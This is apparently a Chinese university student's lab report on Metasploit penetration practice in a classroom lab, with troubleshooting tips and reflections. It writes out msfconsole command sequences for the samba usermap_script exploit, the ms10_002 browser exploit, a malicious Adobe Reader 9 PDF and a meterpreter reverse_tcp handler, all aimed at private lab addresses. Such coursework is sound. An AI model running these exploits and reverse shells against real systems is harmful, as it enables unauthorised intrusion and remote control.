网络与系统攻防技术|实验六 Metasploit攻击渗透实践

网络与系统攻防技术

实验六 Metasploit攻击渗透实践

dky 20192414 袁浩然


实践目标

  • 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

    • 一个主动攻击实践,尽量使用最新的类似漏洞;
    • 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
    • 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
    • 成功应用任何一个辅助模块。
  • 以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除1分。

实验过程

实验一 一个主动攻击实践(samba漏洞)

  • 获得ubuntu靶机的IP地址

  • 使用nessus对ubuntu靶机进行扫描,发现samba漏洞

  • kali启动msf查找samba模块,发现有好几个

  • 使用其中一个samba模块进行攻击,设置目的主机,攻击成功!!!

    msfconsole use exploit/multi/samba/usermap_script set rhosts 172.17.140.212 run 

实验二 一个针对浏览器的攻击(ms10_002)

  • 确定XP靶机IP地址

  • kali启动msf查找ms10_002模块

  • 设置目的主机和网页url,执行

    msfconsole search ms10_002 use 0 set serhost 192.168.152.138 set uripath 20192414 run 
  • xp靶机打开192.168.152.130:8080/20192414网页

  • 成功连接

实验三 针对客户端的攻击(adobe reader 9)

  • 确定XP靶机IP地址,在XP靶机安装adobe reader 9

  • use windows/fileformat/adobe_cooltype_sing使用adobe reader 攻击模块

  • 设置主机IP和主机端口,生成pdf文件

  • kali打开效果

  • 使用exploit/multi/hander监听

  • 在windowsxp使用adobe reader 9 打开

  • 连接成功!

    msfconsole use windows/fileformat/adobe_cooltype_sing set lhost 192.168.152.130 set lport 4444 exploit  msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.152.130 set lport 4444 exploit 

实验四 成功应用任何一个辅助模块

  • 使用show auxiliary查看所有辅助功能

  • 最后选择使用最简单的nmap对靶机进行扫描

问题及解决方案

  • 问题一
    • kali攻击不成功
    • 出现以下原因有很多
      • kali防火墙未关(kali的防火墙必须关,靶机的防火墙可关可不关)
      • 操作系统的版本不对,此漏洞可能已经修复。比如攻击浏览器漏洞,使用win7的IE就不尽人意
      • 软件版本不对,adobe reader的版本不为9,可能会导致攻击不成功
    • 解决方案
      • ufw disable 关闭防火墙
      • 换操作系统
      • 换软件版本
  • 问题二
    • 木马文件闪退
    • 出现以下原因也有很多
      • 靶机的内存不足,打开直接闪退
      • 操作系统或者软件版本不对
    • 解决方案
      • 加内存
      • 换操作系统或者版本

实验感想

  • 实验一为我自己通过nessus对ubuntu靶机进行扫描,发现很多高危漏洞,然后一个一个进行百度搜索,发现samba漏洞有可利用的空间。然后搜索如何用msfconsole对samba进行渗透,最后成功。这是我自己探索发现并成功渗透的漏洞,非常有成就感
  • 其他漏洞都通过学长或者同学的博客找到的。在这些实验中,没有复杂的命令,但是需要有耐心,不断换操作系统和软件,最后终于攻击成功!